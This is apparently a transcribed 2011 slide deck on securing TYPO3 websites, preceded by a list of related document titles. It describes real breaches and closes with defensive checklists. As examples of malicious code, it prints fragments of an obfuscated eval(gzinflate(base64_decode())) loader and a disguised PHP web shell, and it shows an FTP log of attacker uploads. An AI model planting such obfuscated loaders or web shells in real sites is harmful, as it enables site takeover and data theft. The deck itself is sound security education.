How to Secure TYPO3 Installations



Similar documents
ReadySpace Limited Unit J, 16/F Reason Group Tower, Castle PeakRoad, Kwai Chung, N.T.

The anatomy of an online banking fraud

Best Practices (Top Security Tips)

Security A to Z the most important terms

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Introduction to Web Security

Where every interaction matters.

OCT Training & Technology Solutions Training@qc.cuny.edu (718)

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

FORBIDDEN - Ethical Hacking Workshop Duration

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

How can I keep my account safe from hackers, scammers and spammers?

INTERNET & COMPUTER SECURITY March 20, Scoville Library. ccayne@biblio.org

10- Assume you open your credit card bill and see several large unauthorized charges unfortunately you may have been the victim of (identity theft)


The current case DNSChanger what computer users can do now

Guidelines for Website Security and Security Counter Measures for e-e Governance Project

DPW ENTERPRISES Web Design and Hosting Services Autoresponder Software User s Guide

The Information Security Problem

Emerging Network Security Threats and what they mean for internal auditors. December 11, 2013 John Gagne, CISSP, CISA

Information Security Guide for Students

Know the Risks. Protect Yourself. Protect Your Business.

Security Awareness For Server Administrators. State of Illinois Central Management Services Security and Compliance Solutions

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

9. Information Assurance and Security, Protecting Information Resources. Janeela Maraj. Tutorial 9 21/11/2014 INFO 1500

Computer Security Self-Test: Questions & Scenarios

Secure Your Home Computer and Router. Windows 7 Abbreviated Version. LeRoy Luginbill, CISSP

MONTHLY WEBSITE MAINTENANCE PACKAGES

Almost 400 million people 1 fall victim to cybercrime every year.

Security Incidents And Trends In Croatia. Domagoj Klasić

BCS IT User Syllabus IT Security for Users Level 2. Version 1.0

Cyber Security. Maintaining Your Identity on the Net

Student Tech Security Training. ITS Security Office

Hardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes

Web application security

How To Set Up A Webhosting Website On Windstream.Com

RLI PROFESSIONAL SERVICES GROUP PROFESSIONAL LEARNING EVENT PSGLE 123. Cybersecurity: A Growing Concern for Small Businesses

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Using Microsoft Expression Web to Upload Your Site

How To Manage Web Content Management System (Wcm)

Web Applica+on Security: Be Offensive! About Me

Website Maintenance Information For My Clients Bob Spies, Flying Seal Systems, LLC Updated: 08- Nov- 2015

(For purposes of this Agreement, "You", " users", and "account holders" are used interchangeably, and where applicable).

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

SBA Cybersecurity for Small Businesses. 1.1 Introduction. 1.2 Course Objectives. 1.3 Course Topics

Loophole+ with Ethical Hacking and Penetration Testing

Promoting Network Security (A Service Provider Perspective)

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Chapter 11 Manage Computing Securely, Safely and Ethically. Discovering Computers Your Interactive Guide to the Digital World

Introduction: 1. Daily 360 Website Scanning for Malware

Security Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions

TYPO3 Security Guide. This document is published under the Open Content License available from

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Certified Cyber Security Analyst VS-1160

The Risks of Cloud Storage

5 DEADLY MISTAKES THAT BUSINESS OWNERS MAKE WITH THEIR COMPUTER NETWORKS AND HOW TO PROTECT YOUR BUSINESS

Fraud and Abuse Policy

Using Internet or Windows Explorer to Upload Your Site

Web Application Worms & Browser Insecurity

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

Rensselaer Union Club Webhosting CPanel Guide

Defense Media Activity Guide To Keeping Your Social Media Accounts Secure

Content Management System

Baidu: Webmaster Tools Overview and Guidelines

SECURITY ORGANISATION Security Awareness and the Five Aspects of Security

Bitrix Software Security. Powerful content management with advanced security features

The SMB Cyber Security Survival Guide

Web Application Penetration Testing

Cross-Site Scripting

USAGE GUIDE ADAM INTERNET SPAM FILTER MANAGER

INFORMATION SECURITY REVIEW

Web Application Security

F-Secure Anti-Virus for Mac 2015

WEB ATTACKS AND COUNTERMEASURES

HowTo. Planning table online

User Manual. version 3.0-r1

Next-Generation Penetration Testing. Benjamin Mossé, MD, Mossé Security

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

ZNetLive Malware Monitoring

Malware & Botnets. Botnets

Overview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms

Transcription:

How to Secure TYPO3 Installations Jochen Weiland

April 2011 "Viagra Hack" Searching for "Viagra" lists unrelated pages in Google

Beispiel

Beispiel

"Exclusive: Many TYPO3 Sites have been hacked" April 27, 2011: A vulnerability in TYPO3 appararently allows attackers to modify websites so that visitors are directed to pharmacy sites when searching Google

July 2011 Data Theft at Retailer Chain Message left by the attackers on homepage: I will buy my iced tea now at somewhere else I now have "secured" the servers :) Hacked in 5 mins, got 2 million customer data sets, morons Nobody feels responsible ;)

July 2011 Data Theft at Political Party Message left by the attackers on the server: "A reasonably up-to-date TYPO3 version would have made this attack impossible, an up-to-date PHP version would have made it more difficult and having a look at Munin from time to time would have been an advantage. You are now facing the cost that you have saved in the past years not updating your IT"

A few years ago... www.flickr.com/photos/light_arted/3157290392/

"Skript kiddies" defacing websites www.flickr.com/photos/joshuadelaughter/2878302498

Motivation: Fun, Honor

Today:

Organized Crime Goals Data Theft, Identity Theft, Fraud Method: Hacking Websites

Goals Distribute Malware Fraud via phishing Ausspähen von Daten Send Spam Attack Websites and Servers (ddos) Manipulate Search Results Offer illegal Downloads

Is TYPO3 insecure?

Examples for malicious Code

Code in index.php, index.html

<? eval(gzinflate(base64_decode(' 1VptUxs5Ev6eqvwHRcuCXevx+AUI8RvJAlmogoSA 2bstknKNPbKtY94yowF82fz365Y0mrExsEA2uc0H 0pJaj1qt7larx9u9znY0jQh5/uz5s9crzkjwMOiu DI7fn/bP11Rz7VMbx8Zx6JsRbEA/znu9EjPHCxyf mdgso8aretmrfhhk24wn6fa/bctmug6bcz8litpj F9BtM858h3seT3IE02N4xtxjAy3m24PDvVPYBXSt ftpf07ii1ygmbauemex5aow+obsbqmkpbnmbd/ww DXKpVFOPJkwMBPfZwOM+FyUeiEvHK2WsOCIH1j6V y5j/u4d/oy923+/0/zjei1phe+t47nfdgx1cldv+ V3PHtnf7u+Tf+/2jQ1Kv1kg/doKE4yE6nm3vvaOI QAihUyGilm1fXV1Vr5rVMJ7Y/RP7GhHrCKFJSxTm V13hUiUCDmqKOa6iBBce6x3vH5Mjhx+yuGOrHjno M+EQXNNin1N+2aU7SqVWH3RKiVZwlwp2LWxEb5PR 1IlBQ12ehNbW1sYrq06JrdASMfMYkUekZoySREv2

Web Shell

Web Shell

666 <?php /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */ $o="qaaacg07ohdvdwonkchuc2z1cwaabmlgj2rm a2t0cg1uyscvjgaayxjpzhnuaglyyn9udhn0lwaa JWBic2puZHVoc25qYiUuLiqAJ3wCJScBqS8BkGsD EC8jcnRiZCsgACcjAGAuJzonYn93a2hjYi8lCAAn JSsnBIYvLi48J3Vic3J1aQBGJy8vYWtoZnMuA5In LCcA9QQ"; eval(base64_decode("jgxsbd0wo2v2ywwoymfz RPAACenoKDWJ1dWh1WHVid2gK4i8ABDIuPAoNR25 gawh1ylgg4hvyiibmzqgwl1nvukibsnric1hqzma ABG5kWHZyaHNidFh1cmkL4S83hAAB8SNwbmkJkHR

How does the Code get onto my Server?

1. FTP 61.100.6.41 D 2826 0 /muster/index.php 61.100.6.41 U 4699 0 /muster/index.php 61.100.6.41 D 82 0 /projekt1/ksk/index.php 61.100.6.41 U 1955 0 /projekt1/ksk/index.php 61.100.6.41 D 88 0 /projekt1/schlecker/index.php 61.100.6.41 U 1961 0 /projekt1/schlecker/index.php 61.100.6.41 D 149 0 /projekt1/typo3conf/index.html 61.100.6.41 U 215 0 /projekt1/typo3conf/index.html 61.100.6.41 D 9078 0 /projekt1/typo3conf/localconf.php 61.100.6.41 U 10951 1 /projekt1/typo3conf/localconf.php 61.100.6.41 D 76210 0 /projekt1/typo3conf/temp_cached_ps1390_ext_localconf.php 61.100.6.41 U 78077 2 /projekt1/typo3conf/temp_cached_ps1390_ext_localconf.php 61.100.6.41 D 61643 0 /projekt1/typo3conf/temp_cached_psfa20_ext_localconf.php 61.100.6.41 U 63516 1 /projekt1/typo3conf/temp_cached_psfa20_ext_localconf.php 61.100.6.41 D 843 0 /projekt1/typo3temp/rtehtmlarea/abouteditor_compressed.js 61.100.6.41 U 930 0 /projekt1/typo3temp/rtehtmlarea/abouteditor_compressed.js

www.flickr.com/photos/danielle_scott/4489965351 www.flickr.com/photos/rolandinsh/494850383 www.flickr.com/photos/maor-x/2972220102

filezilla-project.org: "It's not a bug it's a design decision. The settings files are stored in a directory that can only be read by your user account and nobody else. If an attacker can read that file he already has full access to anything."

FTP Configuration Text fileadmin/user_upload/images

2. Security Flaws

How to secure TYPO3 Installations?

Restrict Access to Files

Use Secure Passwords Is this a secure password? Xt3!vM8-

Use Secure Passwords 9 or more characters Mixed upper/lowercase, special characters Do not use the same password everywhere Use a password manager Passwords are stored as md5 hash, but...

md5.rednoize.com

ext: checkmysite Analyze index.php for malicious code Notify Administrator via E-Mail Put "Maintenance" Message on Website Redirect to another Site Available in TER

Check List Keep your software up-to-date Browser, TYPO3, Extensions, Server Do not use FTP Do not store passwords in applications

Check List Create backups (offsite storage) Subscribe to TYPO3-announce mailing list Remove software that is not needed

Questions?

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information